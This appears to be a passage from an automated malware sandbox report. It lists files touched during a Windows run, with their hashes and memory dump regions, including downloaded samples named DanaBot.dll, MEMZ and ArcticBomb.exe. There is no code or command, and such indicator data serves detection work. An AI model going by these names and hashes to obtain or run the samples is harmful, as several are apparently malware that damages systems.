| SHA512 | aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4f6c384d1c5a305ea03268347fc6d80c |
| SHA1 | 06c6668d370a12e61bece46e5ac9837ec7a6fc57 |
| SHA256 | b05786c1b4ed4ad15613c8f2f8a823243c6113e05287d75d803f96d64c51e16c |
| SHA512 | f85d7b063ea08d15169206f7f3def7b1a9ef42425d737c2eac28382ff829584cda2dabe582d9345ea9774977c3ff701ed8bf42fe64e89dc187c5bc6ed5649dab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 5c09dde07dffe0724d363aebfd51e0fd |
| SHA1 | 2f1a0c002e567f041f5f0efe3ebf0e82932489bc |
| SHA256 | bacd081d9dd7603f3997f55fda5ca5cdd8088218d1d977d6deaad68b502d31ad |
| SHA512 | 8b5ace24ba59e6a95400dab0a7a4a66d44751444169b8ed57e3268e327824be89e8255e9fb23dae9014d206ea9b029ebfa8ce3685c7235c1fba8a2d44ba1bd6e |
C:\Users\Admin\DOWNLO~1\DanaBot.dll
| MD5 | 7e76f7a5c55a5bc5f5e2d7a9e886782b |
| SHA1 | fc500153dba682e53776bef53123086f00c0e041 |
| SHA256 | abd75572f897cdda88cec22922d15b509ee8c840fa5894b0aecbef6de23908a3 |
| SHA512 | 0318e0040f4dbf954f27fb10a69bce2248e785a31d855615a1eaf303a772ad51d47906a113605d7bfd3c2b2265bf83c61538f78b071f85ee3c4948f5cde3fb24 |
memory/6368-5164-0x00000000026B0000-0x000000000291B000-memory.dmp
memory/7160-5165-0x0000000000400000-0x0000000000AAD000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old
| MD5 | 8b3db52513ba2d2fc064ec54c1ff754c |
| SHA1 | 62558ace9ee76e6bd27d7b9ec809914d5836f7be |
| SHA256 | ee606e2f355b9882fe8bc7352198d369f1ae3ee35892b1194d3f45877c50dcc5 |
| SHA512 | ec0e81c8976a958d013cbff2e9088feb349c9b28a89ac1f07be2fac390c0da3f22513c8e089bf42921720406f687c3d5037eee7e35c0750d3952526dc9a78447 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old
| MD5 | db6dc8220e66c3e40ec04e779baea360 |
| SHA1 | cc04bf48f5c7124c2f751d2f990a22422bc15693 |
| SHA256 | 9a224f8250525092f7e82bf53187b8c715281c1d287dee3d156102396db84717 |
| SHA512 | 04ea2defacaf64d9f3675c784939d04a65564446afc4b1228139e3b0f3a79b9aa6f9080d957072d6bec3ed7735f805c32c15e921813953f76e20e3c66a5b8a5f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | a660fb4a361252e2d53b05f7a44cb094 |
| SHA1 | 421eb54db12d346de07319ef1ef13c52c9e98613 |
| SHA256 | b4622df73ceeeb5d2531005cc1c1e84164b444f1e0c8024b50428b775a039be5 |
| SHA512 | f373a44f20513b4bf634dce7002aa4af8cadd57a0d09c1020349bcac0c932c0f9c180ecfaaed3e497e7b0777f2df386fb2efe94544fb375a52b5bd176f2928f5 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1824842878\manifest.json
| MD5 | 811f0436837c701dc1cea3d6292b3922 |
| SHA1 | 4e51a3e9f5cbf8c9c96985dabe8ffc2de28dae87 |
| SHA256 | dbfb38a16e33a39c35ac50bd81782e4608be14954f1df69ac8272c0b9ce87a5d |
| SHA512 | 21e7bf2f8333b2900bcbcb871ede14684073249597d105095dc7d3f101e7ccc326068732f11d4a167365f245a3f2205793f520c7666d7f948e70919b40b43d35 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Well Known Domains\1.2.0.0\well_known_domains.dll
| MD5 | f5f5b37fd514776f455864502c852773 |
| SHA1 | 8d5ed434173fd77feb33cb6cb0fad5e2388d97c6 |
| SHA256 | 2778063e5ded354d852004e80492edb3a0f731b838bb27ba3a233bc937592f6e |
| SHA512 | b0931f1cae171190e6ec8880f4d560cc7b3d5bffe1db11525bd133eaf51e2e0b3c920ea194d6c7577f95e7b4b4380f7845c82eb2898ad1f5c35d4550f93a14b6 |
memory/6452-5237-0x0000000000400000-0x000000000066B000-memory.dmp
C:\Users\Admin\Downloads\Funsoul.exe
| MD5 | a13a4db860d743a088ef7ab9bacb4dda |
| SHA1 | 8461cdeef23b6357468a7fb6e118b59273ed528c |
| SHA256 | 69ee59cee5a1d39739d935701cfa917f75787b29e0b9bda9ada9e2642ade434c |
| SHA512 | 52909b5fcbf00ef4025f6051ee1b8a933fc2a0bd7a292fe25fac708f358e7c96d6d31ba263d07128d56bc614fcbd053b2fa1249024a8138baf30da8ac5f54806 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 61fa1d96822236ff7cc702a7d819ff3d |
| SHA1 | 9dc22757a8fdc8766392d5aba773d8258ccdaf04 |
| SHA256 | 8341048c934301bff63e0a63d2839517edd5ad5c675e5b504a8e8b8583dd45a6 |
| SHA512 | a5f37e23f2bd105502b350604fdacd89c5c2db134c4b3eb4b23de6e7061d0e2691ecaba15f91615f4462c8e22cc520c7546618aea3a933607bbe28975dfaeebb |
C:\Users\Admin\Downloads\Lacon.exe
| MD5 | cb0f7b3fd927cf0d0ba36302e6f9af86 |
| SHA1 | 32bdc349a35916e8991e69e9be1bd2596b6321cc |
| SHA256 | 9b3f73a12a793d1648f3209e1e3f10bbb548b1ec21d53b8ac060b7b95ae4ef1f |
| SHA512 | e6152f3645d73c63f3f3aa9881fe8b404f9794b14a8ecaea659621828462baf042c13c88bb7f2c32277fa854ceda3056d09aa5603e92b107c6c8194464154252 |
memory/6172-5299-0x0000000000400000-0x000000000040E000-memory.dmp
C:\Windows\SysWOW64\Bndt32.txt
| MD5 | e8744d83bd2476be93a2edcdd244538b |
| SHA1 | 22ffcc3d10de71e7ed7ae5a272ae195dd0e9a117 |
| SHA256 | d23b3db3027d6f901104d374f254d1296f2ca68dde0bc52b5b60e1305876b7c7 |
| SHA512 | e71ce02064fa90fed302b5787eb38ff12de610327da1b7d037310183e36c57ef17e3e604be23cca6a0636c03a153505b320d3fd4db9e51ec629787be885531ce |
memory/6172-5344-0x0000000000400000-0x000000000040E000-memory.dmp
memory/6460-5346-0x0000000000400000-0x000000000040E000-memory.dmp
memory/6452-5345-0x0000000000400000-0x000000000066B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 74e605a4307df6869bc569a0fc10b118 |
| SHA1 | fb94cc336a2a57ac18ea8352c55a8c866c07b24b |
| SHA256 | 7ce1029328ba4960c5f7429c113cf3ec41d86a3dfb935d48cd7fb3aa890dbb9b |
| SHA512 | b1629e0bd5b2aaf44cb7fbc68990748bdba07bc7591dd7afc1e5aa180234f01990385922ad72bdc4c8e467237b36c8875b598ae24917646c8ac6dcbc8b028d0d |
memory/7164-5365-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4416-5367-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4644-5370-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1784-5373-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4408-5374-0x0000000000400000-0x000000000040E000-memory.dmp
memory/6552-5375-0x0000000000400000-0x000000000040E000-memory.dmp
C:\Users\Admin\Downloads\Pikachu.exe
| MD5 | 715614e09261b39dfa439fa1326c0cec |
| SHA1 | 52d118a34da7f5037cde04c31ff491eb25933b18 |
| SHA256 | e1dfc005d5403fb2f356276f0abe19df68249ce10e5035450926d56c2f8d3652 |
| SHA512 | fe905c388b0711f54941076a29b11f2b605655b4a3f409d9f0f077f2fe91f241401035310daa490afb6df50a6deff5456be5ee86984e7b9069506efa07af51ae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | eb7942401d9bb9e2906f6e7fc4b783c9 |
| SHA1 | b6fb9d3eb68ace1b9c061e18d9d0a547e5f0fee4 |
| SHA256 | 4eadf228d8337184610c182e27b7b5fb5068e56b4fd4819aff19e255820520b6 |
| SHA512 | b54be750a8258cd2c6327521abae16d47652b375885746630b57aa1d7f523d50ee3412d502f8296dc9c3291e38fbb4cd045ea2481edb79b2d67bb90b976ed97e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 09e6d02a5b7c5bad643bc7247e74ae23 |
| SHA1 | 4faf290cfb30f66bc3f7219d15d465ec418fb968 |
| SHA256 | 87a437be3e46fd556a1dbad4940c5d5223887467fb62deda792f3fd15b14618c |
| SHA512 | 900b9518b28dec5944abfb08bd3d4065d6a767cb43a7e3a13c18d85e41edc27a6bb07b6170f7ab80a9a7e888adf8f96cdcd03381e6558df98d26e2aee807fecf |
C:\Users\Admin\Downloads\Prolin.exe
| MD5 | 65eeb8a0fce412d7f236f8348357d1c0 |
| SHA1 | c31af321819481bcc15b2121f3b5c04481eaf525 |
| SHA256 | db0c7e3029fb2a048e7a3e74c9cbf3e8bcec06288b5eafac5aae678d8663bffc |
| SHA512 | fad1b721a6420984e13d2278b1d6b5bd70442ab3517553682880a9a8d90f9d47000ad6069cb68d3218d01bc23f771936bcce2529b646501984b954ae9e9ce573 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1987350999\manifest.json
| MD5 | ba25fcf816a017558d3434583e9746b8 |
| SHA1 | be05c87f7adf6b21273a4e94b3592618b6a4a624 |
| SHA256 | 0d664bc422a696452111b9a48e7da9043c03786c8d5401282cff9d77bcc34b11 |
| SHA512 | 3763bd77675221e323faa5502023dc677c08911a673db038e4108a2d4d71b1a6c0727a65128898bb5dfab275e399f4b7ed19ca2194a8a286e8f9171b3536546f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 6177f32df1ed6af2b802e1eb06ae7f54 |
| SHA1 | 75b5f36c2cab4a530fbfefa445948ea90749e050 |
| SHA256 | 14cb5215cab62387cbb69a18461d6dce6a99f670530fa96f0f75acc06cacbbc7 |
| SHA512 | c8048ef3d7a009ebac8c8c622495b53f6cef09db5c069276642265c4e0a651d09a1e66b01f73259ea585347f133cffb743daea7986ed03f57f03f6759f5de796 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 80fc40119dc8ed78b0b3db427b3a996b |
| SHA1 | ff821a7c747ee2ad83de2a3a53707f7a76c273af |
| SHA256 | dccb28704e5f23b499eabfcc3eab2f1e1d4a6264312235d676766fe9b6256d88 |
| SHA512 | c3502dd80206b1c26cef5286597fd1c385cfa62eb9cba688e74d00943cdbe14f51a689ad9ea7d091d63b7cd943ed67d1364458cd928e33f8bb0a8479748cb62d |
C:\Users\Admin\Downloads\Quamo.exe
| MD5 | a1f722324492fda51077449ec2db2827 |
| SHA1 | e4d8d27d77f8c2f5282a899a48184c40939c1665 |
| SHA256 | fc2ced1d89845dcfae55b6e854cd0e622fdf98baeeb4a67a60852ecd1212f93b |
| SHA512 | 6c30ce6a2055300990a951ab487039d92985271a06123d81864495bebc88fb6790be81397f729be4dfb2667d5bad506f51ce93426e4f9369f93fe5c832d8c9e9 |
C:\Users\Admin\Downloads\Funsoul.exe
| MD5 | d6174dce867e791a3a08df6b8b772598 |
| SHA1 | b777cc1c3538f92212c36d8bdf5665b5e0976b0f |
| SHA256 | 47b92d9da91c884b7cb01ba401b5591c7b5cec7d24abc2b08a2d72a86eca8576 |
| SHA512 | cb1c36e8297cea3f173263d3a01d00c5cb2669a2d13a3fb1849132bb345400ed9be5affdade63fcd5eddafdfa6990e868befe02d37777f9995ed4272371bb937 |
C:\Users\Admin\Downloads\Trood.a.exe
| MD5 | 47d1f48a127736e63aad709ddc9d81d0 |
| SHA1 | 36e2049448fbdade83e14aaf9c947a2d1d4fe29e |
| SHA256 | 24dd269b4d5edeb591ad992db33553d90f1848f58c06c9dd9fb3cdb4eaf812f5 |
| SHA512 | d9446385c5f1f341dd575bf9d3fbc9062320b745c150f4101390577723dbc77a9ef0a01df3fdd7e394f438be1aca4479c94d3e4451b81e1d759f26f71fb19b16 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 72b5625c26fe6b7666743923aed3a686 |
| SHA1 | 447f59d62fa77bb2de7a38a757dbd4ad006a91c0 |
| SHA256 | ff1c0f3a8a218ac202d333e2e87ff4537584cfd1419079d0bfafc7e96172a5f5 |
| SHA512 | 1a1d21bb61eff037a837b46c3d89e375551bfe87531212720f5a962f985d1d06b8e32ad3652674e246cb32f61386e6b3be05f277e815ea4dcf63d3d71818c974 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8bd7914be4578d18b0b28fcd6428c99b |
| SHA1 | c6581a392015cb23b3be5b3aa6e37265a0cc8e5b |
| SHA256 | 73974e8640fbb3cb5e98eebbfe1b5e1f2bc266c72bc41ac9d48f389830b935df |
| SHA512 | a8a88b6947ac7750dc86a4edd7924ba326100118b397c39a294cecf2073e1faeb817319efaeebe9781bdb41bde62f508cf96856def491bca0c0f7b226e16b11c |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-as.hyb
| MD5 | 8961fdd3db036dd43002659a4e4a7365 |
| SHA1 | 7b2fa321d50d5417e6c8d48145e86d15b7ff8321 |
| SHA256 | c2784e33158a807135850f7125a7eaabe472b3cfc7afb82c74f02da69ea250fe |
| SHA512 | 531ecec11d296a1ab3faeb2c7ac619da9d80c1054a2ccee8a5a0cd996346fea2a2fee159ac5a8d79b46a764a2aa8e542d6a79d86b3d7dda461e41b19c9bebe92 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-hi.hyb
| MD5 | 0807cf29fc4c5d7d87c1689eb2e0baaa |
| SHA1 | d0914fb069469d47a36d339ca70164253fccf022 |
| SHA256 | f4df224d459fd111698dd5a13613c5bbf0ed11f04278d60230d028010eac0c42 |
| SHA512 | 5324fd47c94f5804bfa1aa6df952949915896a3fc77dccaed0eeffeafe995ce087faef035aecea6b4c864a16ad32de00055f55260af974f2c41afff14dce00f3 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-nb.hyb
| MD5 | 677edd1a17d50f0bd11783f58725d0e7 |
| SHA1 | 98fedc5862c78f3b03daed1ff9efbe5e31c205ee |
| SHA256 | c2771fbb1bfff7db5e267dc7a4505a9675c6b98cfe7a8f7ae5686d7a5a2b3dd0 |
| SHA512 | c368f6687fa8a2ef110fcb2b65df13f6a67feac7106014bd9ea9315f16e4d7f5cbc8b4a67ba2169c6909d49642d88ae2a0a9cd3f1eb889af326f29b379cfd3ff |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\manifest.json
| MD5 | 2617c38bed67a4190fc499142b6f2867 |
| SHA1 | a37f0251cd6be0a6983d9a04193b773f86d31da1 |
| SHA256 | d571ef33b0e707571f10bb37b99a607d6f43afe33f53d15b4395b16ef3fda665 |
| SHA512 | b08053050692765f172142bad7afbcd038235275c923f3cd089d556251482b1081e53c4ad7367a1fb11ca927f2ad183dc63d31ccfbf85b0160cf76a31343a6d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 530cfeaf9949095be02943a45143b123 |
| SHA1 | 610f2e79bb6158d006dce86d5f34229b5eb64ebd |
| SHA256 | ea28e38ac215d10d6ec7094a19172e14cd105b84da58eb82f6ff0e0bcbd3e816 |
| SHA512 | be3ca4292e4a5ca2c0e74af9d1dfb5ce005d170cda493cdab9bbe2c6b228ba5d8b08f36f2a6a45cc72fb5d5db83a9c41b40f0a32d4fdad6ba98d0e8f418fbb09 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_700424168\manifest.json
| MD5 | d20acf8558cf23f01769cf4aa61237e0 |
| SHA1 | c4b21384309b0ff177d9cd3aa4198ab327eb2993 |
| SHA256 | 3493b321a7fc5e183ed6f223ae55ce962541717d0b332d16bdc7cbcadf7e6f78 |
| SHA512 | 73d082cbd71f6d0f06c7afc1bf63ee41c9a8e501df3e56f21a551b2d369a0afc8306894c8e0a38d0324e2ac403ec506ac1ecd8e9b61a9cb27134a229ccb13725 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.76\LICENSE
| MD5 | aad9405766b20014ab3beb08b99536de |
| SHA1 | 486a379bdfeecdc99ed3f4617f35ae65babe9d47 |
| SHA256 | ed0f972d56566a96fb2f128a7b58091dfbf32dc365b975bc9318c9701677f44d |
| SHA512 | bd9bf257306fdaff3f1e3e1fccb1f0d6a3181d436035124bd4953679d1af2cd5b4cc053b0e2ef17745ae44ae919cd8fd9663fbc0cd9ed36607e9b2472c206852 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.76\Filtering Rules
| MD5 | d7c9c6d2e1d9ae242d68a8316f41198c |
| SHA1 | 8d2ddccc88a10468e5bffad1bd377be82d053357 |
| SHA256 | f215127185b2ee6b01e12b6ca75d3e5c4e454598dd4aed36124ae13d59afd547 |
| SHA512 | 7fd14824e9200dd99e1fd2cee402656dc0cfc3d0a60058c5eb05c68e9e65b7f0b47e550fb4d6c2b59eba204dbf3ef9e69dc9723b43a9b3ccd5412d6b77715fc3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000180
| MD5 | e8ed8aaf35e6059ba28504c19ff50bab |
| SHA1 | 01412235baf64c5b928252639369eea4e2ba5192 |
| SHA256 | 2d2a22db20a44474afbd7b0e6488690bad584dcae9789a5db776cc1a00b98728 |
| SHA512 | d007c96b2fad26763d27be8447ca65e0ab890deb6388b90cf83c0b3431e09b225f7424098927b54f15fe34eae953b61b45371b0df4b2d89c60be9c006ffe9034 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | ec588a5864a508a7e6f5acc067f28542 |
| SHA1 | 50a67fbe02d0b0f62b9310959a1dcc79770241fa |
| SHA256 | 9e947fdedcd42001e5504d17968cb09650bace5b41dfa069f10274e693825192 |
| SHA512 | 6ef55365cface534f6fd5ef6c971e97ef8f2b6147af559ae7d8973c039f94b6f292e9f4369428297a2f05b60b5eaccbd958c932a3a55764b1c0a4880c7f8354e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\cc6e64b3-dc93-4763-845e-edfce562583b.tmp
| MD5 | cab795b9adfd632dfe16826cc24646ac |
| SHA1 | d9142a87121ee2a035a55801b8febefcdd2abd70 |
| SHA256 | b4a4d5adefedd9a06401826f19aac387b5490df2325df990ba2b858496aad70b |
| SHA512 | f6629e9a35335be112577404ccd0bc65a258304cc7a04943f553c1269c05ffbd2223a1ab2f053a92eecb5242ae9091a7315ece637c21e38171c5046fa88f188d |
C:\Users\Admin\Downloads\ClassicShell.exe
| MD5 | c67dff7c65792e6ea24aa748f34b9232 |
| SHA1 | 438b6fa7d5a2c7ca49837f403bcbb73c14d46a3e |
| SHA256 | a848bf24651421fbcd15c7e44f80bb87cbacd2599eb86508829537693359e032 |
| SHA512 | 5e1b0b024f36288c1d2dd4bc5cf4e6b7d469e1e7e29dcef748d17a92b9396c94440eb27348cd2561d17593d8c705d4d9b51ae7b49b50c6dee85f73dec7100879 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | f88b3abbc49a1b71cf7c0d3fade5b138 |
| SHA1 | 2d15de5ad04b54df2be2ee9fa72f95837aa6525d |
| SHA256 | 9d2c637ebb664e7b8d4407b601b53fe0863156e79dd37b1fbec3e72ac53a7e81 |
| SHA512 | 2fe0509f9a870ff720f4323d364e4b5d026c411f242c82cf0c47573e58dfc9ad62f8fda5b3cb9408702d9e88557f44ceab8c89980977cc5df3f110ccea2a9c39 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.76\Ruleset Data
| MD5 | 6a62b26b738ffda1414b1e45b3b97c12 |
| SHA1 | ff44417a79841f948bdbeec9049f9fb59d16dc9f |
| SHA256 | da3927c997d3bb2326e97a8dd7835c28f50ad8c4a9dd407669f20730c0159207 |
| SHA512 | 820caca570523600a057dbedd38b7e3b375d6427d716cb74d0aee0825e621268a9f418f135443e5bc6bd7b9a1fbb8eb6676324d46f9111e56404b8953f23de53 |
C:\Users\Admin\Downloads\ArcticBomb.exe
| MD5 | ea534626d73f9eb0e134de9885054892 |
| SHA1 | ab03e674b407aecf29c907b39717dec004843b13 |
| SHA256 | 322eb96fc33119d8ed21b45f1cd57670f74fb42fd8888275ca4879dce1c1511c |
| SHA512 | c8cda90323fd94387a566641ec48cb086540a400726032f3261151afe8a981730688a4dcd0983d9585355e22833a035ef627dbd1f643c4399f9ddce118a3a851 |
memory/6020-6279-0x0000000000400000-0x0000000000454000-memory.dmp
memory/6020-6281-0x0000000000400000-0x0000000000454000-memory.dmp
memory/7068-6285-0x0000000000400000-0x0000000000454000-memory.dmp
memory/4036-6287-0x0000000000400000-0x0000000000454000-memory.dmp
C:\Users\Admin\Downloads\ColorBug.exe
| MD5 | 6536b10e5a713803d034c607d2de19e3 |
| SHA1 | a6000c05f565a36d2250bdab2ce78f505ca624b7 |
| SHA256 | 775ba68597507cf3c24663f5016d257446abeb66627f20f8f832c0860cad84de |
| SHA512 | 61727cf0b150aad6965b4f118f33fd43600fb23dde5f0a3e780cc9998dfcc038b7542bfae9043ce28fb08d613c2a91ff9166f28a2a449d0e3253adc2cb110018 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 3691a69524ee7cb526661e9a086cd04c |
| SHA1 | ef5667f8f1a1d37e76318cfa20de254f02bc8b35 |
| SHA256 | 4c8f575c3a798a562953ac9121574c0ae7f0e527feab6d8927dbfb1fff9a7595 |
| SHA512 | a0b71b7210f3d3329edb9d1aa880e3cdcf32b912532e97461976c05cb20621b37c49cf588f53061a90718a5da917e4a0d4641446a0c46cb3e827f1d2e425bd61 |
C:\Users\Admin\Downloads\FlashKiller.exe
| MD5 | 331973644859575a72f7b08ba0447f2a |
| SHA1 | 869a4f0c48ed46b8fe107c0368d5206bc8b2efb5 |
| SHA256 | 353df4f186c06a626373b0978d15ec6357510fd0d4ac54b63217b37142ab52d3 |
| SHA512 | 402662eb4d47af234b3e5fbba10c6d77bdfdb9ff8ecfdd9d204f0264b64ea97fc3b5c54469f537173a26c72b3733550854749649d649bc0153c8fe3faacc50a1 |
memory/7080-6410-0x0000000000400000-0x0000000000404000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 4b8bd95d40f05bfdfb54bf45984f85c0 |
| SHA1 | e5ecb1b5f370d7fcc1e917d473d596789e124a28 |
| SHA256 | 33c51a8ccefeb51ad320a7e559165d4b2b8efde8f7fc9c43a5739fb4fdd143f2 |
| SHA512 | ec10688ef19ebcfe76de2dd9ac0591372743d58fc596681c2523d6256026f99169fce7e67071e19207041c196b1c54ca32f7a166d20a1050dec5ac371a1a421a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.1.39.0\edge_checkout_page_validator.js
| MD5 | 1db0c159a8afc8073ed9f0a83f782ae8 |
| SHA1 | 0874d03928cc347db7f5c7720fa6c23321671fb7 |
| SHA256 | f7ee28dee8d78ac7456a683cbc673e8b3b57bc9a1ba37c0d6d5d4332a7534d93 |
| SHA512 | 4fda31e15918efa31ebbd69965e3fa1702daf6b1995af2c010a63e55030ee2f3affb4c45ea6275b7d4c35c0e61bdfbd3051872f392725394489b4c43e8cb3bf1 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_618854295\manifest.json
| MD5 | 207f8230e8e90b79c9a957fcecb35037 |
| SHA1 | 838fd6a9aa7ac1083a1b0cdaa29ed39e7e593a51 |
| SHA256 | fcd7d9808d01ba6f20fef9d34aa6dfaed249bfedf85cf12ce8299d58df3250a1 |
| SHA512 | 8cf890bcb56d20f45a91b6d46940f7a5cf98307cd80ca05561704a2965f2984634dfd3a07d3aac089cbb2c8fafdf74b8152fc1f6c1404fe338c5eac4efa5f5f2 |
C:\Users\Admin\Downloads\Gas.exe
| MD5 | e7af185503236e623705368a443a17d9 |
| SHA1 | 863084d6e7f3ed1ba6cc43f0746445b9ad218474 |
| SHA256 | da3f40b66cc657ea33dbf547eb05d8d4fb5fb5cf753689d0222039a3292c937a |
| SHA512 | 8db51d9029dfb0a1a112899ca1f1dacfd37ae9dec4d07594900c5725bc0f60212ab69395f560b30b20f6e1dffba84d585ef5ae2b43f77c3d5373fe481a8b8fc3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 22f6cdb553695b88279626215338ccc8 |
| SHA1 | 38c59cd3e0d5c3cd57c9227e53116135279729da |
| SHA256 | f4f5e2ac2c111e6362b2214930d737fdaa207dd47b2b17886fd2e75166c8a416 |
| SHA512 | a2dc50f2220180d8b3ba651dc1e00402526795ffe5d2476c5d1ffb6e83dd09c781862eb0d2681ac29d80dbc68ed483e30250e201adc73639d1d4712ef1a5cfba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000185
| MD5 | c718a1cbf0e13674714c66694be02421 |
| SHA1 | 001d5370d3a7ee48db6caaecb1c213b5dfdf8e65 |
| SHA256 | cde188d6c4d6e64d6abfdea1e113314f9cdf9417bca36eb7201e6b766e5f5a7f |
| SHA512 | ba0ddff47b618740dfcb63024435c36d895889dd3cf6b4559969283ba8100e8063f5c7767e56dfab67a2b5c96e4ae22e141e5b09e81be5cec9aa7ca7827b4b8a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 57f01ee5b209b3edbbe639243189a619 |
| SHA1 | 20914d6b92e0c301ed68f3ca43563af5e3418899 |
| SHA256 | 9ebaa842409bebfdef42237d766eba1e991ebf7aec6f2643dd96aa279b59bf48 |
| SHA512 | 1ba1cd47b301ed152b0c89f597b8f5b832c17ab2a0320e8913ba13d948140a83eb46392d015ca32644e4177993889c569abdcd0ee19f10983eb57490172ef399 |
C:\Users\Admin\Downloads\MEMZ (1).exe
| MD5 | 19dbec50735b5f2a72d4199c4e184960 |
| SHA1 | 6fed7732f7cb6f59743795b2ab154a3676f4c822 |
| SHA256 | a3d5715a81f2fbeb5f76c88c9c21eeee87142909716472f911ff6950c790c24d |
| SHA512 | aa8a6bbb1ec516d5d5acf8be6863a4c6c5d754cee12b3d374c3a6acb393376806edc422f0ffb661c210e5b9485da88521e4a0956a4b7b08a5467cfaacd90591d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 8c0360bb8769bfc5bae4d7be69835d1e |
| SHA1 | 8b8aff64cca056dc7eea431aa24c84bd1a417204 |
| SHA256 | 652d1d948a76efbe1d4f554887cb06ddcfe3a73ff2059112eff80c641750823b |
| SHA512 | da415fe20086758b0477dce23ec23dd605e46627b0069c596f9fb3289e8fd0474d363f4677aa6fc1e081d0801bd04eff97249049a1aea54e8332751caf36907a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 85e13f4dd1c46646dc9c09464cd3c11b |
| SHA1 | aad5608a912e93b6d2839620447c06d3da90135b |
| SHA256 | 424005dceaca1ed252de33aa3d55827faa7c38ecb326118cc67ab5884db90add |
| SHA512 | f97d0d314267edcf68634297655e9b1bac4e7577a20298b2b2fa72fa2843c9f57ee1b3f4cd441825f3e5a6208dfa876bbffc8ccd6559b73e1583a9387dc82237 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000186
| MD5 | 04251a49a240dbf60975ac262fc6aeb7 |
| SHA1 | e211ca63af2ab85ffab1e5fbbdf28a4ef8f77de0 |
| SHA256 | 85a58aa96dccd94316a34608ba996656a22c8158d5156b6e454d9d69e6ff38c3 |
| SHA512 | 3422a231e1dadb68d3567a99d46791392ecf5883fd3bbc2cae19a595364dac46e4b2712db70b61b488937d906413d39411554034ffd3058389700a93c17568d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 8d2ddb1dd83d2f0cf0df7bb710138429 |
| SHA1 | 67330db4c788229ae05db1d3b12a01fea4ffd9bd |
| SHA256 | aed304c4b95e27618f41bf1402d1714798d0b028b3fdf553dccf16da54ce3515 |
| SHA512 | 1b6ca17623bb262e65ea69e053380139a94fbe835570340617b514c8544703e1d6b650e0ea6668abb584fc5c6de29e6b0e5539ad678a063d3a8a30aea262e0a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000187
| MD5 | dc66a5b4c5453191f0f7913d5c690312 |
| SHA1 | 1af88dbac3911bc86bffcf59c596753adc2a36d3 |
| SHA256 | e24e08ef732410328cbfd07d4ce10fdc5af170a18587fcdb8f4dd87e25422a0d |
| SHA512 | 653ce837032c824ca30c05da196552e90e3c7cd8b7c57a59bcc771796f3603fccde7d3f52549022ca6797fa9c95a37b51c67a30345dfc92e179e70c88195dffb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | cd735006de7a92d6e82c26351240d675 |
| SHA1 | 08a4ff97efdc7fd9ae8a1a6a1fcaf79d3db08226 |
